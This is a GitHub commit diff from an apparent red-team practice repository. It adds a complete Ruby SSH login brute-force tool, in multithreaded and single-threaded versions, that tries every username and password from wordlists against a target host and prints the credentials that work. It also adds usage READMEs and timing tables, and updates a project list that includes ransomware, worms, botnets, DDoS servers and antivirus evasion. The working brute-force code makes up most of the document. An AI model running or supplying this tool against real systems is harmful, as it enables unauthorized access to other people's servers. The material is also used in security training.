STRLCPY/100-redteam-projects

Merge pull request #7 from AugustoSavi/master

[18]	SSH Login bruteforce tool - <Ruby> | AugustoSavi

Héber Júlio committed with GitHub 2 years ago

260ff8c2

2 parents
71c3b969
c5a5d1ff

Total 6 files Show one by one

■ ■ ■ ■ ■ ■

Projects/18_SSH_Login_bruteforce_tool/MultiThread/README.md

1	+	<div align="center"> BRUTE FORCE SSH MULTITHREAD</div>
2	+
3	+
4	+	Caso \|Users \| Passwords \| time
5	+	--------- \| --------- \| ------ \| ------
6	+	Pior \| 1 \| 1000 \| 1m42,850s
7	+	Pior \| 1 \| 1000 \| 1m43,139s
8	+	Pior \| 1 \| 1000 \| 1m43,509s

■ ■ ■ ■ ■ ■

Projects/18_SSH_Login_bruteforce_tool/MultiThread/bruteForceSSH.rb

1	+	#!/usr/bin/env ruby
2	+
3	+	# AUGUSTO SAVI \|@Augusto_Savi
4	+
5	+	require 'net/ssh'
6	+
7	+	@threads = []
8	+	@accepts = []
9	+	@users = []
10	+	@passwords = []
11	+
12	+	hosts = ARGV[0]
13	+	users_path = ARGV[1]
14	+	passs_path = ARGV[2]
15	+
16	+
17	+	def verifyArgs(hosts,users_path,passs_path)
18	+	if !hosts \|\| !users_path \|\| ! passs_path
19	+	puts "[!] correct usage: rb bruteForceSSH.rb host path_to_users_file path_to_passwords_file"
20	+	puts "[!] exemple: rb bruteForceSSH.rb 192.168.0.1 ./users.txt ./passwords.txt"
21	+	end
22	+	begin
23	+
24	+	users_file = File.open(users_path)
25	+	@users = users_file.readlines.map(&:chomp)
26	+	users_file.close
27	+
28	+	passs_file = File.open(passs_path)
29	+	@passwords = passs_file.readlines.map(&:chomp)
30	+	passs_file.close
31	+
32	+	if @users.empty?
33	+	puts "file with empty users"
34	+	end
35	+	if @passwords.empty?
36	+	puts "file with empty passwords"
37	+	end
38	+
39	+	rescue
40	+	puts "error open files"
41	+	end
42	+	end
43	+
44	+	def attack_ssh(host, user, password, port=22, timeout = 5)
45	+	begin
46	+	Net::SSH.start(host, user, :password => password,
47	+	:auth_methods => ["password"], :port => port,
48	+	:non_interactive => true, :timeout => timeout ) do \|session\|
49	+	puts "Password Found: #{host} \| #{user}:#{password}"
50	+	session.close unless session.nil?
51	+	@accepts.push({'host' => host,'user' => user, 'password' => password})
52	+	end
53	+
54	+	rescue Net::SSH::Disconnect
55	+	puts "[!] The remote '#{host}' has disconnected unexpectedly"
56	+	rescue Net::SSH::ConnectionTimeout
57	+	puts "[!] The host '#{host}' not alive!"
58	+	rescue Net::SSH::Timeout
59	+	puts "[!] The host '#{host}' disconnected/timeouted unexpectedly!"
60	+	rescue Errno::ECONNREFUSED
61	+	puts "[!] Incorrect port #{port} for #{host}"
62	+	rescue Net::SSH::AuthenticationFailed
63	+	puts "[!] Wrong Password: #{host} \| #{user}:#{password}"
64	+	rescue Net::SSH::Authentication::DisallowedMethod
65	+	puts "[!] The host '#{host}' doesn't accept password authentication method."
66	+	rescue Errno::EHOSTUNREACH
67	+	puts "[!] No route to host: '#{host}'"
68	+	rescue Errno::ECONNRESET
69	+	puts "[!] Connection reset by peer: '#{host}'"
70	+	rescue SocketError => ex
71	+	puts ex.inspect
72	+	end
73	+	end
74	+
75	+	verifyArgs(hosts,users_path,passs_path)
76	+
77	+	puts "Users list size: #{@users.length()}"
78	+	puts "Passwords list size: #{@passwords.length()}"
79	+
80	+	@users.each do \|user\|
81	+	@passwords.each do \|password\|
82	+	sleep(0.1)
83	+	@threads << Thread.new { attack_ssh(hosts, user, password) }
84	+	end
85	+	end
86	+
87	+	@threads.each { \|thr\| thr.join }
88	+
89	+	puts "accepts #{@accepts.length()}"
90	+	@accepts.each { \|accept\| puts accept }

■ ■ ■ ■ ■ ■

Projects/18_SSH_Login_bruteforce_tool/README.md

1	+	<h1 align="center">SSH BruteForce</h1>
2	+
3	+	[MultiThread](MultiThread)
4	+
5	+	[SingleThread](SingleThread)
6	+
7	+	## :information_source: Requisitos
8	+	[Ruby](https://www.ruby-lang.org/pt/)
9	+
10	+	[concurrent-ruby](https://github.com/ruby-concurrency/concurrent-ruby) (to execute PoolThread)
11	+
12	+	## :information_source: How to execute
13	+	```
14	+	// Access the dir you want, exemple:
15	+	cd MultiThread
16	+
17	+	// run de script, exemple: ruby bruteForceSSH.rb br1.wqewqeqw.tk ../data/users.txt ../data/passwords1000.txt
18	+	ruby bruteForceSSH.rb <host> <path_to_user_list> <path_to_user_password>
19	+
20	+	```
21	+

■ ■ ■ ■ ■ ■

Projects/18_SSH_Login_bruteforce_tool/SingleThread/README.md

1	+	<div align="center"> BRUTE FORCE SSH SINGLE THREAD</div>
2	+
3	+
4	+	Caso \|Users \| Passwords \| time
5	+	--------- \| --------- \| ------ \| ------
6	+	Pior \| 1 \| 1000 \| 29m20,738s
7	+	Pior \| 1 \| 1000 \| 27m35,670s
8	+	Pior \| 1 \| 1000 \| 27m46,094s

■ ■ ■ ■ ■ ■

Projects/18_SSH_Login_bruteforce_tool/SingleThread/bruteForceSSH.rb

1	+	#!/usr/bin/env ruby
2	+	# AUGUSTO SAVI \| @Augusto_Savi
3	+
4	+	require 'net/ssh'
5	+
6	+	@accepts = []
7	+	@users = []
8	+	@passwords = []
9	+
10	+	hosts = ARGV[0]
11	+	users_path = ARGV[1]
12	+	passs_path = ARGV[2]
13	+
14	+
15	+	def verifyArgs(hosts,users_path,passs_path)
16	+	if !hosts \|\| !users_path \|\| ! passs_path
17	+	puts "[!] correct usage: rb bruteForceSSH.rb host path_to_users_file path_to_passwords_file"
18	+	puts "[!] exemple: rb bruteForceSSH.rb 192.168.0.1 ./users.txt ./passwords.txt"
19	+	end
20	+	begin
21	+	users_file = File.open(users_path)
22	+	@users = users_file.readlines.map(&:chomp)
23	+	users_file.close
24	+
25	+	passs_file = File.open(passs_path)
26	+	@passwords = passs_file.readlines.map(&:chomp)
27	+	passs_file.close
28	+
29	+	if @users.empty?
30	+	puts "file with empty users"
31	+	end
32	+	if @passwords.empty?
33	+	puts "file with empty passwords"
34	+	end
35	+
36	+	rescue
37	+	puts "error open files"
38	+	end
39	+	end
40	+
41	+	def attack_ssh(host, user, password, port=22, timeout = 5)
42	+	begin
43	+	Net::SSH.start(host, user, :password => password,
44	+	:auth_methods => ["password"], :port => port,
45	+	:non_interactive => true, :timeout => timeout ) do \|session\|
46	+	puts "Password Found: #{host} \| #{user}:#{password}"
47	+	session.close unless session.nil?
48	+	@accepts.push({'host' => host,'user' => user, 'password' => password})
49	+	end
50	+
51	+	rescue Net::SSH::Disconnect
52	+	puts "[!] The remote '#{host}' has disconnected unexpectedly \| #{host} : #{user} : #{password}"
53	+	rescue Net::SSH::ConnectionTimeout
54	+	puts "[!] The host '#{host}' not alive! \| #{host} : #{user} : #{password}"
55	+	rescue Net::SSH::Timeout
56	+	puts "[!] The host '#{host}' disconnected/timeouted unexpectedly! \| #{host} : #{user} : #{password}"
57	+	rescue Errno::ECONNREFUSED
58	+	puts "[!] Incorrect port #{port} for #{host} \| #{host} : #{user} : #{password}"
59	+	rescue Net::SSH::AuthenticationFailed
60	+	puts "[!] Wrong Password: #{host} \| #{user}:#{password} \| #{host} : #{user} : #{password}"
61	+	rescue Net::SSH::Authentication::DisallowedMethod
62	+	puts "[!] The host '#{host}' doesn't accept password authentication method. \| #{host} : #{user} : #{password}"
63	+	rescue Errno::EHOSTUNREACH
64	+	puts "[!] No route to host: '#{host}' \| #{host} : #{user} : #{password}"
65	+	rescue Errno::ECONNRESET
66	+	puts "[!] Connection reset by peer: '#{host}' \| #{host} : #{user} : #{password}"
67	+	rescue SocketError => ex
68	+	puts ex.inspect
69	+	end
70	+	end
71	+
72	+	verifyArgs(hosts,users_path,passs_path)
73	+
74	+	puts "Users list size: #{@users.length()}"
75	+	puts "Passwords list size: #{@passwords.length()}"
76	+
77	+	@users.each do \|user\|
78	+	@passwords.each do \|password\|
79	+	attack_ssh(hosts, user, password)
80	+	end
81	+	end
82	+
83	+	puts @accepts

■ ■ ■ ■ ■ ■

README.md

		skipped 27 lines
28	28
29	29		And remember: With great power comes... (we already know).
30	30
31		-	---------------------------------------------------------------------------------------------
32		-	Level 1 \| Basic
33		-	------------------------------------------------\|--------------------------------------------
34		-	[0] \| TCP or UDP server just to receive messages
35		-	[1] \| TCP chat server
36		-	[2] \| UDP chat server
37		-	[3] \| Multi-threaded UDP or TCP chat server
38		-	[4] \| Server for file transfers
39		-	[5] \| Caesar Cipher tool
40		-	[6] \| TCP chat server -> The messages should be encoded with Caesar Cipher
41		-	[7] \| ROT13 Cipher
42		-	[8] \| UDP Chat server -> The messages should be encoded with ROT13 Cipher
43		-	[9] \| Remote command execution
44		-	[10] \| Recreate the Netcat tool
45		-	--------------------------------------------------------------------------------------------
46		-	Level 2 \| Essential
47		-	------------------------------------------------\|-------------------------------------------
48		-	[11] \| Simple port scanner
49		-	[12] \| Port scanner with OS fingerprint using TTL (Time To Live)
50		-	[13] \| Port scanner with port footprint (HTTP? DNS? FTP? IRC?)
51		-	[14] \| Simple Web Directory brute-forcer (Threaded)
52		-	[15] \| Recursive Web Directory brute-forcer (Threaded peer recursion)
53		-	[16] \| Web Login bruteforce tool
54		-	[17] \| FTP Login bruteforce tool
55		-	[18] \| SSH Login bruteforce tool
56		-	[19] \| FTP User footprint
57		-	[20] \| MYSQL User footprint
58		-	[21] \| Simple Google Bot for web scan
59		-	[22] \| Auto website comment bot
60		-	[23] \| Auto website message bot
61		-	[24] \| Web-scrapping using Regex
62		-	[25] \| Bot to collect information about someone using Google / Bing / Yahoo!
63		-	[26] \| Simple SQLi tester
64		-	[27] \| Simple XSS tester
65		-	[28] \| Simple Wordpress brute-forcer
66		-	[29] \| SQLi database retriever
67		-	[30] \| Spam creator
68		-	--------------------------------------------------------------------------------------------
69		-	Level 3 \| Advanced Network Attacks
70		-	------------------------------------------------\|-------------------------------------------
71		-	[31] \| Payload for reverse shell
72		-	[32] \| Payload to capture screenshots
73		-	[33] \| Implement a Botnet
74		-	[34] \| Passive web scanner
75		-	[35] \| ARP poisoning tool
76		-	[36] \| Application that creates random shortcuts on screen
77		-	[37] \| Application to encrypt a file
78		-	[38] \| Develop a Ransomware application
79		-	[39] \| Spam Email sender
80		-	[40] \| HTTP server for phishing
81		-	[41] \| Honeypot creator
82		-	[42] \| Application that connects to the Tor Network
83		-	[43] \| IRC Server
84		-	[44] \| Packet Capture tool
	31	+	-------------------------------------------------------------------------------------------------------------------------------------------
	32	+	Level 1 \| Basic \| Exemple
	33	+	------------------------------------------------\|------------------------------------------------\|-----------------------------------------
	34	+	[0] \| TCP or UDP server just to receive messages \| :heavy_check_mark:
	35	+	[1] \| TCP chat server \| :heavy_check_mark:
	36	+	[2] \| UDP chat server \| :x:
	37	+	[3] \| Multi-threaded UDP or TCP chat server \| :x:
	38	+	[4] \| Server for file transfers \| :x:
	39	+	[5] \| Caesar Cipher tool \| :x:
	40	+	[6] \| TCP chat server -> The messages should be encoded with Caesar Cipher \| :x:
	41	+	[7] \| ROT13 Cipher \| :x:
	42	+	[8] \| UDP Chat server -> The messages should be encoded with ROT13 Cipher \| :x:
	43	+	[9] \| Remote command execution \| :x:
	44	+	[10] \| Recreate the Netcat tool \| :x:
	45	+	-------------------------------------------------------------------------------------------------------------------------------------------
	46	+	Level 2 \| Essential \| Exemple
	47	+	------------------------------------------------\|------------------------------------------------\|-----------------------------------------
	48	+	[11] \| Simple port scanner \| :heavy_check_mark:
	49	+	[12] \| Port scanner with OS fingerprint using TTL (Time To Live) \| :x:
	50	+	[13] \| Port scanner with port footprint (HTTP? DNS? FTP? IRC?) \| :x:
	51	+	[14] \| Simple Web Directory brute-forcer (Threaded) \| :x:
	52	+	[15] \| Recursive Web Directory brute-forcer (Threaded peer recursion) \| :x:
	53	+	[16] \| Web Login bruteforce tool \| :x:
	54	+	[17] \| FTP Login bruteforce tool \| :x:
	55	+	[18] \| SSH Login bruteforce tool \| :heavy_check_mark:
	56	+	[19] \| FTP User footprint \| :x:
	57	+	[20] \| MYSQL User footprint \| :x:
	58	+	[21] \| Simple Google Bot for web scan \| :x:
	59	+	[22] \| Auto website comment bot \| :x:
	60	+	[23] \| Auto website message bot \| :x:
	61	+	[24] \| Web-scrapping using Regex \| :x:
	62	+	[25] \| Bot to collect information about someone using Google / Bing / Yahoo! \| :x:
	63	+	[26] \| Simple SQLi tester \| :x:
	64	+	[27] \| Simple XSS tester \| :x:
	65	+	[28] \| Simple Wordpress brute-forcer \| :x:
	66	+	[29] \| SQLi database retriever \| :x:
	67	+	[30] \| Spam creator \| :x:
	68	+	-------------------------------------------------------------------------------------------------------------------------------------------
	69	+	Level 3 \| Advanced Network Attacks \| Exemple
	70	+	------------------------------------------------\|-------------------------------------------\|----------------------------------------------
	71	+	[31] \| Payload for reverse shell \| :x:
	72	+	[32] \| Payload to capture screenshots \| :x:
	73	+	[33] \| Implement a Botnet \| :x:
	74	+	[34] \| Passive web scanner \| :x:
	75	+	[35] \| ARP poisoning tool \| :x:
	76	+	[36] \| Application that creates random shortcuts on screen \| :x:
	77	+	[37] \| Application to encrypt a file \| :x:
	78	+	[38] \| Develop a Ransomware application \| :x:
	79	+	[39] \| Spam Email sender \| :x:
	80	+	[40] \| HTTP server for phishing \| :x:
	81	+	[41] \| Honeypot creator \| :x:
	82	+	[42] \| Application that connects to the Tor Network \| :x:
	83	+	[43] \| IRC Server \| :x:
	84	+	[44] \| Packet Capture tool \| :x:
85	85
86		-	-------------------------------------------------------------------------------------------
87		-	Level 4 \| Data analysis, payloads and more networking
88		-	------------------------------------------------\|------------------------------------------
89		-	[45] \| Packet Data analysis
90		-	[46] \| Packet image analysis with OpenCV
91		-	[47] \| Develop a hexdump tool
92		-	[48] \| Payload that moves the mouse cursor
93		-	[49] \| Vigenère Cipher
94		-	[50] \| Payload that starts automatically using Windows Regedit
95		-	[51] \| Payload that starts as a daemon
96		-	[52] \| Payload that retrieves browser information
97		-	[53] \| Link generator
98		-	[54] \| ASCII Name generator [ just for fun :) ]
99		-	[55] \| Full chat server with private messages, file and image transfer
100		-	[56] \| Simple firewall
101		-	[57] \| Gateway
102		-	[58] \| Powershell payload generator
103		-	[59] \| Bash payload generator
104		-	[60] \| Subdomain enumerator
105		-	[61] \| DNS Enumerator
106		-	[62] \| Your own interpreter
107		-	[63] \| Develop a Worm
108		-	[64] \| Server for DDOS
109		-	[65] \| Implement an IP Tracker
110		-	[66] \| BurpSuite extender
111		-	[67] \| Develop a Trojan
112		-	[68] \| Man In The Browser tool (kind of)
113		-	[69] \| Process monitor (Windows and Linux)
114		-	[70] \| Windows token privilege escalation tool
	86	+	-------------------------------------------------------------------------------------------------------------------------------------------
	87	+	Level 4 \| Data analysis, payloads and more networking \| Exemple
	88	+	------------------------------------------------\|------------------------------------------\|-----------------------------------------------
	89	+	[45] \| Packet Data analysis \| :x:
	90	+	[46] \| Packet image analysis with OpenCV \| :x:
	91	+	[47] \| Develop a hexdump tool \| :x:
	92	+	[48] \| Payload that moves the mouse cursor \| :x:
	93	+	[49] \| Vigenère Cipher \| :x:
	94	+	[50] \| Payload that starts automatically using Windows Regedit \| :x:
	95	+	[51] \| Payload that starts as a daemon \| :x:
	96	+	[52] \| Payload that retrieves browser information \| :x:
	97	+	[53] \| Link generator \| :x:
	98	+	[54] \| ASCII Name generator [ just for fun :) ] \| :x:
	99	+	[55] \| Full chat server with private messages, file and image transfer \| :x:
	100	+	[56] \| Simple firewall \| :x:
	101	+	[57] \| Gateway \| :x:
	102	+	[58] \| Powershell payload generator \| :x:
	103	+	[59] \| Bash payload generator \| :x:
	104	+	[60] \| Subdomain enumerator \| :x:
	105	+	[61] \| DNS Enumerator \| :x:
	106	+	[62] \| Your own interpreter \| :x:
	107	+	[63] \| Develop a Worm \| :x:
	108	+	[64] \| Server for DDOS \| :x:
	109	+	[65] \| Implement an IP Tracker \| :x:
	110	+	[66] \| BurpSuite extender \| :x:
	111	+	[67] \| Develop a Trojan \| :x:
	112	+	[68] \| Man In The Browser tool (kind of) \| :x:
	113	+	[69] \| Process monitor (Windows and Linux) \| :x:
	114	+	[70] \| Windows token privilege escalation tool \| :x:
115	115
116		-	------------------------------------------------------------------------------------------
117		-	Level 5 \| Cryptography, Reverse Engineering and Post exploitation
118		-	------------------------------------------------\|------------------------------------------
119		-	[71] \| Develop a code injection tool
120		-	[72] \| Develop a Worm with auto replication over email
121		-	[73] \| Simple Disassembler
122		-	[74] \| Server for DDoS with multi-staged operations and multi-threaded handling of clients
123		-	[75] \| Password hash cracker
124		-	[76] \| Direct code injection exploit
125		-	[77] \| Android daemon payload
126		-	[78] \| Browser exploitation tool
127		-	[79] \| Simple tool for Reverse Engineering
128		-	[80] \| Script for OS enumeration (after shell)
129		-	[81] \| RSA Payload generator
130		-	[82] \| Handshake capture
131		-	[83] \| Wifi monitor
132		-	[84] \| Buffer Overflow exploit
133		-	[85] \| Stack Overflow exploit
134		-	[86] \| Banner exploit
135		-	[87] \| ISS Exploit
136		-	[88] \| Wifi de-authentication attack (DoS) tool
137		-	[89] \| Badchar detector
138		-	[90] \| Firewall detector
139		-	[91] \| Exploitation Framework
140		-	[92] \| Botnet with SSH C&C and automatic server backup to prevent loss of control
141		-	[93] \| Windows enumeration tool
142		-	[94] \| Application information gathering (after shell)
143		-	[95] \| Recreate TCPDUMP
144		-	[96] \| Bluetooth exploit
145		-	[97] \| Windows Blue Screen Exploit
146		-	[98] \| Encoded exploit
147		-	[99] \| Antivirus evasion application
148		-	[100] \| Your own metasploit module
149		-	------------------------------------------------------------------------------------------
	116	+	-------------------------------------------------------------------------------------------------------------------------------------------
	117	+	Level 5 \| Cryptography, Reverse Engineering and Post exploitation \| Exemple
	118	+	------------------------------------------------\|------------------------------------------\|-----------------------------------------------
	119	+	[71] \| Develop a code injection tool \| :x:
	120	+	[72] \| Develop a Worm with auto replication over email \| :x:
	121	+	[73] \| Simple Disassembler \| :x:
	122	+	[74] \| Server for DDoS with multi-staged operations and multi-threaded handling of clients \| :x:
	123	+	[75] \| Password hash cracker \| :x:
	124	+	[76] \| Direct code injection exploit \| :x:
	125	+	[77] \| Android daemon payload \| :x:
	126	+	[78] \| Browser exploitation tool \| :x:
	127	+	[79] \| Simple tool for Reverse Engineering \| :x:
	128	+	[80] \| Script for OS enumeration (after shell) \| :x:
	129	+	[81] \| RSA Payload generator \| :x:
	130	+	[82] \| Handshake capture \| :x:
	131	+	[83] \| Wifi monitor \| :x:
	132	+	[84] \| Buffer Overflow exploit \| :x:
	133	+	[85] \| Stack Overflow exploit \| :x:
	134	+	[86] \| Banner exploit \| :x:
	135	+	[87] \| ISS Exploit \| :x:
	136	+	[88] \| Wifi de-authentication attack (DoS) tool \| :x:
	137	+	[89] \| Badchar detector \| :x:
	138	+	[90] \| Firewall detector \| :x:
	139	+	[91] \| Exploitation Framework \| :x:
	140	+	[92] \| Botnet with SSH C&C and automatic server backup to prevent loss of control \| :x:
	141	+	[93] \| Windows enumeration tool \| :x:
	142	+	[94] \| Application information gathering (after shell) \| :x:
	143	+	[95] \| Recreate TCPDUMP \| :x:
	144	+	[96] \| Bluetooth exploit \| :x:
	145	+	[97] \| Windows Blue Screen Exploit \| :x:
	146	+	[98] \| Encoded exploit \| :x:
	147	+	[99] \| Antivirus evasion application \| :x:
	148	+	[100] \| Your own metasploit module \| :x:
	149	+	-------------------------------------------------------------------------------------------------------------------------------------------
150	150		## Adding your examples
151	151
152	152		You can make a pull request for the "Projects" directory and name the file in
		skipped 12 lines

1	+	<div align="center"> BRUTE FORCE SSH MULTITHREAD</div>
2	+
3	+
4	+	Caso \|Users \| Passwords \| time
5	+	--------- \| --------- \| ------ \| ------
6	+	Pior \| 1 \| 1000 \| 1m42,850s
7	+	Pior \| 1 \| 1000 \| 1m43,139s
8	+	Pior \| 1 \| 1000 \| 1m43,509s

1	+	<div align="center"> BRUTE FORCE SSH SINGLE THREAD</div>
2	+
3	+
4	+	Caso \|Users \| Passwords \| time
5	+	--------- \| --------- \| ------ \| ------
6	+	Pior \| 1 \| 1000 \| 29m20,738s
7	+	Pior \| 1 \| 1000 \| 27m35,670s
8	+	Pior \| 1 \| 1000 \| 27m46,094s